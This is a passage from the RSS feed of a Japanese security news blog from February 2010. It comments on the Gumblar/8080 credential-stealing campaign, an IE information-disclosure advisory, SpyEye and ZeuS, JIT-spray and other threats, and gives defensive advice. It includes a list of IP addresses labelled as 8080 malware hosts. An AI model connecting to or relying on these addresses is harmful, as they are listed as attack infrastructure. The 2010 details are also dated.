<a href="http://www.so-net.ne.jp/security/news/view.cgi?type=2&amp;no=2143"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_so-net.gif" class="cIcon" alt="" />ガンブラー攻撃の対象ソフトをJPCERTが確認～アカウント情報盗み外部送信</a><br />
自分が管理できる環境下は、「感染しないように」で済む話ですが、レジストリやテンポラリ領域の一時ファイルにCredentialが意識せずに残ると、忘れた頃に漏洩するというケースにつながりかねません。<br />
FTPの接続情報は、基本的には保存しないようにするしかなさそうです。<br />
※秘密鍵の登録可能なSSH(SFTP)環境の場合、必ずパスフレーズ付きの鍵を生成し、鍵認証を行ってください。できれば SSH1(SCP)は使用を避け、22番以外のPortを使用してください。<br />
<span class="cCom">もっとも、キーロガーを埋め込まれてるなら何をやっても同じですが、そこまで墜ちている環境の話はやってもショウガナイですね・・・</span><br />
<br />
----------<br />
<strong>MEGA patch</strong><br />
おかしいな・・1月初頭はあんなに平和だったのに・・・<br />
<a href="http://blogs.technet.com/msrc/archive/2010/02/04/february-2010-bulletin-release-advance-notification.aspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_msdn.gif" class="cIcon" alt="" />February 2010 Bulletin Release Advance Notification</a><br />
ひ～ふ～み～の・・２６！？<br />
<br />
<span class="cAttention">Date: Wednesday, Feb 10<br />
Time: 11:00 a.m. PST (UTC -8) </span><br />
<br />
<a href="http://www.us-cert.gov/current/index.html#microsoft_releases_advance_notification_for31"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_uscert.gif" class="cIcon" alt="" />Microsoft Releases Advance Notification for February Security Bulletin</a><br />
<br />
続く<br />
----------<br />
<strong>IEの情報流出</strong><br />
わざわざ保護モードを無効にしているユーザはともかく、残りは XP+IE6の話では？と思っていたのですが、割と広範な話なのかな？<br />
<a href="http://www.microsoft.com/japan/technet/security/advisory/980088.mspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />[980088] Internet Explorer の脆弱性により、情報漏えいが起こる</a><br />
<span class="cRefer">回避策のセクションの、Internet Explorer のネットワーク プロトコルのロックダウンの FixIt は、何をしますか?<br />
Internet Explorer のネットワーク プロトコルのロックダウンの FixIt は、file:// プロトコルを制限するので、スクリプトおよび ActiveX コントロールがインターネット ゾーンで file:// プロトコルを使用して実行するのを防ぎます。 </span><br />
Fix IT: <a href="http://support.microsoft.com/kb/980088"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />マイクロソフト セキュリティ アドバイザリ: Internet Explorer の脆弱性により情報漏えいが起こる</a><br />
ActiveX経由で ローカルの file:// にアクセスされることって、結構あるんですけどね（特にダウンロードしないタイプのオンラインスキャン）<br />
FixItすると、そのへんも動かなくなったりして（笑）&lt;-- 試してません<br />
<br />
<a href="http://www.itmedia.co.jp/enterprise/articles/1002/04/news018.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />IEに情報流出の脆弱性、Microsoftがアドバイザリー公開</a><br />
<br />
フルパスでそのファイルの存在が特定できるケースというと、ユーザ名が漏洩した場合少し厄介かもしれませんね。<br />
<a href="http://connect.microsoft.com/VisualStudioJapan/feedback/details/346253/release"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />Releaseでコンパイルした実行ファイルにユーザ名が埋め込まれる</a><br />
<br />
ちなみに、このExploit は <a href="http://www.blackhat.com/html/bh-dc-10/bh-dc-10-home.html"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_blackhat2.gif" class="cIcon" alt="" />BlackHat DC+2010</a>で公表されたものだそうです。<br />
<br />
----------<br />
<strong>新ツールキット SpyEye</strong><br />
Botnet同士が仲が悪いのは、少ない（でもけっこうある）脆弱ノードのパイの取り合いをやってるから・・？<br />
<a href="http://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_symantec.gif" class="cIcon" alt="" />SpyEye Bot versus Zeus Bot </a><br />
機能リストの中に・・・<br />
<span class="cRefer">Zeus killer </span><br />
（笑）<br />
まぁ、お互いにいがみあって潰しあってくれればいいんですけど、お互いに切磋琢磨するのはやめてください。<br />
<br />
<a href="http://www.sophos.com/blogs/sophoslabs/v/post/7123"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sophos.gif" class="cIcon" alt="" />iframes are EVIL! Hate Zeus! -- October 26th, 2009</a><br />
<br />
----------<br />
<strong>pushdoじゃない！</strong><br />
そういえば、過去に特集(<img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" /><a href="http://blog.trendmicro.com/pushdocutwail-%E2%80%93-the-art-of-spamming/">1</a> <a href="http://blog.trendmicro.com/pushdocutwail-%e2%80%93-from-russia-with-love-part-2-of-5/">2</a> <a href="http://blog.trendmicro.com/pushdocutwail-%e2%80%93-can%e2%80%99t-touch-this-part-3-of-5/">3</a> <a href="http://blog.trendmicro.com/pushdocutwail-%e2%80%93-sniffing-for-the-win-part-4-of-5/">4</a> <a href="http://blog.trendmicro.com/pushdocutwail-%e2%80%93-traditional-av-is-useless-part-5-of-5/">5</a>)を組んで、Pushdoの権威だと思っていた TrendMicroが、<a href="http://isc.sans.org/diary.html?storyid=8131"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />今回のDDoSの件</a>に何も言及していなかったので変だナとは思っていましたが・・・<br />
<a href="http://blog.trendmicro.com/the-pushdo-puzzle-ddos-or-not-ddos/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" />The Pushdo Puzzle – DDoS or not DDoS?</a><br />
<span class="cRefer">we can affirm that this attack does not come from Pushdo.</span><br />
あらら？<br />
<span class="cRefer">The common detection name used for this is <span class="cBurn">Harebot</span> or <span class="cBurn">Shgray</span> but there is a reason why people are putting the tag Pushdo onto this new threat. Some AV vendors are detecting it as Pandex and that was another name for Pushdo so that’s where the name association came from.</span><br />
botnetの勢力圏マップもいろいろありすぎてよくわかりませんね・・・<br />
<br />
----------<br />
<strong>ああ・・もうヤメテ・・</strong><br />
<a href="http://www.theregister.co.uk/2010/02/03/microsoft_windows_protection_bypass/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Researchers penetrate last bastion of Windows security</a><br />
DEPやASLRの保護下にあってもそれを無効化する JITスプレーという脆弱性攻撃の手法が紹介されました。<br />
<span class="cRefer">The "JIT-spray" allows attackers to overcome ASLR, which normally thwarts execution by picking a different memory location to load system components each time an operating system is started.<br />
"With this JIT-spray, it works fairly reliably, <u>so at least nine out of 10 times you'll guess the right position</u>,"</span><br />
<br />
視なかったことにしよう・・<br />
<br />
<span class="cRefer">"ASLR and DEP in IE 8 on Windows 7 provides a really good protection against these kinds of exploits,"</span><br />
<br />
----------<br />
<strong>iPhone PKI問題</strong><br />
<a href="http://jp.techcrunch.com/archives/20100203potentially-nasty-new-iphone-security-flaw-discovered/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />とてもいやらしくて厄介なセキュリティの欠陥がiPhoneに見つかった</a><br />
なるほど、どのへんが危険なのかというのがよくわかりました。<br />
大量のiPhoneを全社規模で導入しているようなところは、ソフトウェアのアップデートに無線を使ってCAのコードサイニング証明を経てダウンロードさせる仕組みがあるようです。その mobileconfigを偽造することで、出所を“Apple Computer”にしたアプリケーションをインストールさせることができるっと・・<br />
<br />
無線でのアップデートの仕組みそのものを考え直さなければならないようですので、結構大変そうです。<br />
<br />
iPhoneユーザ諸氏は、オンラインでいきなりこんな画面が出たら気をつけましょう。<br />
<img src="http://www3.atword.jp/gnome/files/2010/02/screen-shot-2010-02-03-at-february-3-25145-pm1.png" alt="" title="screen-shot-2010-02-03-at-february-3-25145-pm1" width="320" height="479" class="alignnone size-full wp-image-7401" /><br />
<br />
----------<br />
<strong>Google and NSA</strong><br />
<a href="http://www.washingtonpost.com/wp-dyn/content/article/2010/02/03/AR2010020304057.html?nav=rss_email/components"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_washingtonpost.gif" class="cIcon" alt="" />Google to enlist NSA to help it ward off cyberattacks</a><br />
なんか、すごくイヤな取り合わせなんですが・・政治の話はこわいからヤメ<br />
<br />
----------<br />
<strong>8080</strong><br />
* NEW *<br />
<span class="cBurn">84.200.227.144</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31400"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31400</a>(ACCELERATED) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
* NEW *<br />
<span class="cBurn">94.199.240.61</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:39023"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS39023</a>(IU-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
<span class="cAttention">213.251.164.84</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
<span class="cAttention">77.68.44.169</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:15418"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS15418</a>(FASTHOSTS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">82.165.47.29</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(SCHLUND) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">87.118.90.76</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31103"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31103</a>(KEYWEB-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">217.160.110.21</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(ONEANDONE-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265313640 | B    | [goog-black-hash 1.50322 update]<br />
| 1265313602 | M    | [goog-malware-hash 1.19132 update]<br />
|   308160 | +8606(299554) ちょっ！<br />
|  1322885 | <br />
EoF<br />
</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/05/feb-05-2010-fri/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/05/feb-05-2010-fri/" />
	</item>
		<item>
		<title>2010.02.04 木曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/04/feb-04-2010-th/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/04/feb-04-2010-th/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 00:55:27 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[8080]]></category>

		<category><![CDATA[@IT]]></category>

		<category><![CDATA[Abuse.ch]]></category>

		<category><![CDATA[adobe]]></category>

		<category><![CDATA[apache]]></category>

		<category><![CDATA[badwarebusters]]></category>

		<category><![CDATA[Blizzard]]></category>

		<category><![CDATA[CGIsecurity]]></category>

		<category><![CDATA[CNet]]></category>

		<category><![CDATA[Conficker]]></category>

		<category><![CDATA[Damballa]]></category>

		<category><![CDATA[ddanchev]]></category>

		<category><![CDATA[Fortinet]]></category>

		<category><![CDATA[GarWarner]]></category>

		<category><![CDATA[gumblar.cn]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[HIRT]]></category>

		<category><![CDATA[IBM XForce]]></category>

		<category><![CDATA[IE]]></category>

		<category><![CDATA[IPA]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[ITPro]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[MiFi]]></category>

		<category><![CDATA[noooo_spam]]></category>

		<category><![CDATA[Panda]]></category>

		<category><![CDATA[puppet]]></category>

		<category><![CDATA[Pushdo]]></category>

		<category><![CDATA[Secunia]]></category>

		<category><![CDATA[SmileBanana]]></category>

		<category><![CDATA[so-net]]></category>

		<category><![CDATA[SquareEnix]]></category>

		<category><![CDATA[TechCrunch]]></category>

		<category><![CDATA[TheRegister]]></category>

		<category><![CDATA[ThreatPost]]></category>

		<category><![CDATA[Torrent]]></category>

		<category><![CDATA[Twitter]]></category>

		<category><![CDATA[VirusTotal]]></category>

		<category><![CDATA[VT]]></category>

		<category><![CDATA[wordpress]]></category>

		<category><![CDATA[ZDNet]]></category>

		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7387</guid>
		<description><![CDATA[

世界がんデー(World Cancer Day)
UICC (国際対がん連合) 日本委員会
2010年世界対がんデー（2月4日）のポスター
ぷよの日
ぷよぷよの語呂合わせから
当サイトでは、誤検知（が連鎖することから [...]]]></description>
			<content:encoded><![CDATA[<p>
<div class="div10refer"></div>
世界がんデー(<a href="http://en.wikipedia.org/wiki/World_Cancer_Day"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />World Cancer Day</a>)<br />
<div class="div10refer"><a href="http://www.jfcr.or.jp/UICC/">UICC (国際対がん連合) 日本委員会</a><br />
<a href="http://www.jfcr.or.jp/UICC/common/images/whats_new/20091125.pdf">2010年世界対がんデー（2月4日）のポスター<img src="http://www3.atword.jp/gnome/files/2009/02/ico_pdf.gif" class="cIcon" alt="" /></a></div>
ぷよの日<br />
<div class="div10refer"><a href="http://ja.wikipedia.org/wiki/%E3%81%B7%E3%82%88%E3%81%B7%E3%82%88"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ぷよぷよ</a>の語呂合わせから<br />
<span class="cCom">当サイトでは、誤検知（が連鎖することから）の隠語となっています（笑）</span></div>
<a href="http://ja.wikipedia.org/wiki/%E6%85%88%E7%85%A7%E5%AF%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />銀閣寺</a>の日<br />
<div class="div10refer"><a href="http://ja.wikipedia.org/wiki/%E8%B6%B3%E5%88%A9%E7%BE%A9%E6%94%BF"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />足利義政</a>（<a href="http://ja.wikipedia.org/wiki/%E5%AE%A4%E7%94%BA%E5%B9%95%E5%BA%9C"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />室町幕府</a>8代将軍）が、銀閣寺(慈照寺)の造営に着手した</div>
<a href="http://ja.wikipedia.org/wiki/%E3%82%B9%E3%83%AA%E3%83%A9%E3%83%B3%E3%82%AB"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />スリランカ</a><br />
<div class="div10refer">1948年、イギリスから独立</div>
<a href="http://ja.wikipedia.org/wiki/%E5%8C%97%E5%AE%8B"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />北宋</a>の建国<br />
<div class="div10refer">960年、<a href="http://ja.wikipedia.org/wiki/%E8%B6%99%E5%8C%A1%E8%83%A4"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />趙匡胤</a>が皇帝に即位。この擁立劇(<a href="http://ja.wikipedia.org/wiki/%E9%99%B3%E6%A9%8B%E3%81%AE%E5%A4%89"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />陳橋の変</a>)は、酒に酔った趙匡胤を軍人が無理矢理即位させたということになっている。</div>
<br />
----------<br />
<strong>R.I.P. apache 1.3</strong><br />
<span class="cCom">またこんなことを書くと何か飛んできそうですが・・・</span><br />
<a href="http://mail-archives.apache.org/mod_mbox/httpd-announce/201002.mbox/%3C20100203000334.GA19021@infiltrator.stdlib.net%3E"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_apache.gif" class="cIcon" alt="" />Apache HTTP Server 1.3.42 released (final release of 1.3.x)</a><br />
<span class="cRefer"> The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 1.3.42 of the Apache HTTP Server ("Apache"). <u>This release is intended as the final release of version 1.3 of the Apache HTTP Server, which has reached end of life status.</u></span><br />
これまで長い間ありがとうございました。<br />
そういえば、最初に触ったApacheのバージョンっていくつだったかなぁ・・？<br />
<span class="cRefer">Upgrade to to the current 2.2 version as soon as possible. For information about how to upgrade, please see the documentation: </span><br />
<a href="http://httpd.apache.org/docs/2.2/upgrading.html"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_apache.gif" class="cIcon" alt="" />http://httpd.apache.org/docs/2.2/upgrading.html</a><br />
現行サーバを apache 1.x で運用している方は、Apache 2.2 への移行を視野にいれたほうがいいでしょう。<br />
現行の最終 stable は <a href="http://www.apache.org/dist/httpd/Announcement2.2.html"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_apache.gif" class="cIcon" alt="" />2.2.14</a><br />
<br />
<a href="http://secunia.com/advisories/38319/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />Apache mod_proxy "ap_proxy_send_fb()" Integer Truncation Vulnerability</a> <span class="cDanger">4</span><br />
<a href="http://www.h-online.com/security/news/item/Apache-HTTP-Server-1-3-s-final-update-released-921133.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Apache HTTP Server 1.3's final update released </a><br />
<a href="http://www.cgisecurity.com/2010/02/rip-apache-1x-apache-1342-marks-of-end-life.html"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_cgi_security.gif" class="cIcon" alt="" />R.I.P. Apache 1.x: Apache 1.3.42 marks of end life</a><br />
<br />
----------<br />
<strong>[980088]</strong><br />
<a href="http://blogs.technet.com/msrc/archive/2010/02/03/security-advisory-980088-released.aspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_msdn.gif" class="cIcon" alt="" />Security Advisory 980088 Released</a><br />
じきに日本語も出るでしょうが<br />
<span class="cRefer">address a publicly disclosed vulnerability in Internet Explorer that <u>may allow Information Disclosure</u> for customers running on Windows XP or who have disabled Internet Explorer Protected Mode.  At this time we are not aware of any attacks seeking to use the vulnerability. </span><br />
WindowsXP+IE6で保護モードを OFF にしている場合、情報流出の恐れがあるとのこと。<br />
リモートからローカルのファイルを盗み見れるということかな？<br />
<br />
<a href="http://www.microsoft.com/technet/security/advisory/980088.mspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />Vulnerability in Internet Explorer Could Allow Information Disclosure</a><br />
<span class="cRefer">Our investigation so far has shown that if a user is using a version of Internet Explorer that is not running in Protected Mode <span class="cBurn">an attacker may be able to access files with an already known filename and location.</span></span><br />
やっぱし・・・<br />
Afficted softwareが IE8とかあるのはキノセイでしょうか？<br />
<br />
とりあえず、（IE使ってる人は）<a href="http://msdn.microsoft.com/ja-jp/library/bb250462%28VS.85%29.aspx"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_msdn_develop.gif" class="cIcon" alt="" />保護モード</a>になっていることを確認して様子見ですね<br />
<br />
微妙に続く<br />
----------<br />
<strong>Microsoftからのおてまみ</strong><br />
<a href="http://pandalabs.pandasecurity.com/microsoft-support-informs-you%E2%80%A6/"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_pandasecurity.gif" class="cIcon" alt="" />Microsoft Support informs you…</a><br />
日本国内でも多数着弾しているようです。<br />
<a href="http://www.virustotal.com/analisis/5b10b41dac9bffa94c0a30a9147d78ff2428882fbef9a4c77e7bb35336252495-1265120583"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_virustotal.gif" class="cIcon" alt="" />9462.officexp-KB910721-FullFile-ENU.zip</a><br />
<a href="http://www.virustotal.com/analisis/2502888e66c20540f663b492595c2debadbe9860b84f30aac04921935aee1ae4-1265146203"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_virustotal.gif" class="cIcon" alt="" />officexp-KB910721-FullFile-ENU.exe</a><br />
<br />
MSがこういう形で不特定多数ユーザにメールを送ることはありません（そのための Microsoft Updateですので）<br />
<br />
微妙に続く<br />
----------<br />
<strong>でもTwitterは</strong><br />
やっちゃったんですよね～<br />
<a href="http://www.itmedia.co.jp/enterprise/articles/1002/03/news024.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />Twitterがパスワード変更を促すメール、フィッシング詐欺で流出か</a><br />
今後のセキュリティ・フィッシング対策として、一石を投げかける事態だと思うんですが、一般的にはあまり騒がれていません。<br />
<br />
というか、こんな原因だったとは・・<br />
<a href="http://jp.techcrunch.com/archives/20100202hidden-backdoors-on-torrent-sites-led-to-the-latest-twitter-attack/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />Twitter攻撃の原因は Torrentサイトの裏口だった</a><br />
<span class="cRefer">Twitterが調べたところ、ここ数年来何者かがTorrentサイトを作り、Torrentサービス始めようとする人相手にサイトを売っていたことがわかった。問題は、この人物がサイトに裏口を仕掛けておき、そこが人気サイトになった時に侵入できるようにしていたらしいことだ。<u>多くの人たちがウェブ上で同じIDとパスワードを使い回しているために、このデータによって大量のTwitterアカウントが漏えいした。</u></span><br />
・・・・・・・・<br />
<br />
<a href="http://status.twitter.com/post/367671822/reason-4132-for-changing-your-password"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />Reason #4132 for Changing Your Password </a><br />
<br />
----------<br />
<strong>週間脆弱性 2010.02.01</strong><br />
<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20100127/343809/?ST=security"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_it_nikkei.gif" class="cIcon" alt="" />チェックしておきたいぜい弱性情報＜2010.02.01＞ </a> <a href="http://www.youtube.com/watch?v=sbET27ChyPM"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_youtube.gif" class="cIcon" alt="" />BGM</a><br />
<div class="div10refer">Internet Explorerのセキュリティ・アップデート（定例外）（2010/01/22）<br />
米アドビ システムズ Shockwave Player 11.5.6.606リリース（2010/01/19）<br />
米アップル セキュリティ・アップデート2010-001（2010/01/19）<br />
RealPlayerのアップデート（2010/01/19）<br />
米シスコ Cisco IOS XRのSSH処理にサービス不能のぜい弱性（2010/01/20）<br />
米シスコ CiscoWorks Internetwork Performance Monitorにバッファ・オーバーフローのぜい弱性（2010/01/20）<br />
Firefox 3.6、Thunderbird 3.0.1リリース（2010/01/21）<br />
キヤノンITソリューションズ製ACCESSGUARDIANにXSSのぜい弱性（2010/01/13） <br />
</div>
Firefox 3.6は自動ではupdateされませんので注意しましょう。<br />
Firefox 3.0系のライフタイムは、2010 年 2 月で切れます。<br />
<br />
----------<br />
<strong>ガンブラーはFTPの夢を見るか</strong><br />
というより、FTP(<a href="http://tools.ietf.org/html/rfc959"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_rfc.gif" class="cIcon" alt="" />RFC959</a>)というプロトコルそのものを破滅に追い込もうとしていますが・・・<br />
<a href="http://www.ipa.go.jp/security/txt/2010/02outline.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_ipa.gif" class="cIcon" alt="" />コンピュータウイルス・不正アクセスの届出状況[1月分]について</a><br />
<span class="cAttention">1. 今月の呼びかけ<br />
「 "ガンブラー" の手口を知り、対策を行いましょう 」 </span><br />
英語の長文読むよりも疲れる・・・・<br />
<br />
で、puppet様のとこ行ってコーヒー吹きました。<br />
<a href="http://puppet.asablo.jp/blog/2010/02/04/4855218"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_betsuninandemo2.gif" class="cIcon" alt="" />いろいろ</a><br />
確かに、この位置関係だと加害者ですね（笑）<br />
<br />
個人的に、gumblar/Gumblar.x/8080 の一番の恐ろしいところは、攻撃者が勤勉すぎる点だと思っています。アクセス先、インジェクション先、送付先、ホスティング、スクリプトをコロコロ手を変え品を変え攻撃してくるので、対処側が追いついてないのです。かといって、検出ルーチンを強化すると、<a href="http://www.google.com/support/forum/p/adsense/thread?tid=5e14b46552f19fcb&amp;hl=ja"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />ぷよって</a>しまうので、セキュ会社も頭が痛いでしょうね。<br />
<br />
ちなみに、FTPのパケットモニタリングは gumblar/Gumblar.xにもあった機能ですが、FTPの環境保存ファイルやレジストリからの直接奪取は 8080/QuickSilverの機能であり、Gumblar.Xにも確認されていません。<br />
<a href="http://blogs.yahoo.co.jp/noooo_spam/59483353.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_yahoo.gif" class="cIcon" alt="" />「FFFTP」をやめてもガンブラーウイルス対策にはならない -- 無題なブログ</a><br />
このような点から見ても、そろそろ区分をきちんとしないと危険な側面がでてきそうですけど、<br />
ま、<br />
<br />
<span class="cRefer">nobody cares .. こまけーことはいいんだよ</span><br />
<br />
という精神でいきましょうかね<br />
<br />
参照：<br />
<a href="http://www.so-net.ne.jp/security/news/view.cgi?type=2&amp;no=2142"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_so-net.gif" class="cIcon" alt="" />サイト改ざんでウイルス感染を広げる「ガンブラー」対策を～IPAが呼びかけ</a><span class="cRefer">IPAは、「ガンブラー」という言葉を、「Webサイト改ざん」と「Webサイトを閲覧するだけで感染させられてしまうウイルス」を組み合わせ、パソコンにウイルスを感染させようとする一連の手口（攻撃手法）を指すものと定義。その手口を詳しく解説している。</span><br />
なんとなく、「」が多いあたりに皮肉を感じてしまうのは穿ち過ぎなんでしょうね。<br />
<a href="http://japan.zdnet.com/news/sec/story/0,2000056194,20407980,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />NRIセキュア、「Gumblar」の感染発見に有効なマルウェア検知サービスを提供開始</a><br />
<span class="cRefer">同サービス」の提供価格は、監視サーバ1台あたり月額36万8000円（税別）。</span><br />
<a href="http://www.fortinet.co.jp/news/pr/2010/pr020310.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_fortinet.gif" class="cIcon" alt="" />フォーティネットウイルス対処状況レポート (2010年1月度)</a><br />
<a href="http://japan.cnet.com/news/sec/story/0,2000056024,20407921,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />1月のウイルス状況、トップの「Gumblar」に加え「Aurora」も猛威－フォーティネット調べ</a><br />
<span class="cRefer">ウイルスの活動量によるトップ10では、1位にウェブ改ざんで話題となっている「Gumblar.Botnet」がランクイン。全体の攻撃割合は 31.3％に達した。同レポートによれば、Gumblarは1月6日以降を境に、一気に活動を広げていた。</span><br />
<br />
----------<br />
<strong>偽Firefoxアップデートには・・・</strong><br />
<a href="http://www.theregister.co.uk/2010/02/03/fake_firefox_download/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Fake Firefox site bundles undead adware</a><br />
<a href="http://threatcenter.blogspot.com/2010/02/fake-firefox-update-pages-push-adware.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_blogger.gif" class="cIcon" alt="" />Fake Firefox Update Pages Push Adware</a><br />
<span class="cRefer">Victims of this scam install the “Hotbar” toolbar by Pinball Corp, formerly Zango.</span><br />
おまえかっ（笑）<br />
<br />
----------<br />
<strong>WoWもトークン導入に</strong><br />
<a href="http://www.h-online.com/security/news/item/Blizzard-warns-of-account-theft-in-World-of-Warcraft-920927.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Blizzard warns of account theft in World of Warcraft </a><br />
<a href="http://account.square-enix.com/manual/jp/about.html">FFXIには既に導入されている</a>ワンタイム･パスワード発行のセキュリティ・トークンですが、世界最大規模で、フィッシングも最大規模な WoWにも導入されるようです。<br />
<br />
そして、何個もじゃらじゃ・・<br />
<br />
----------<br />
<strong>シグネチャ･不正コピー</strong><br />
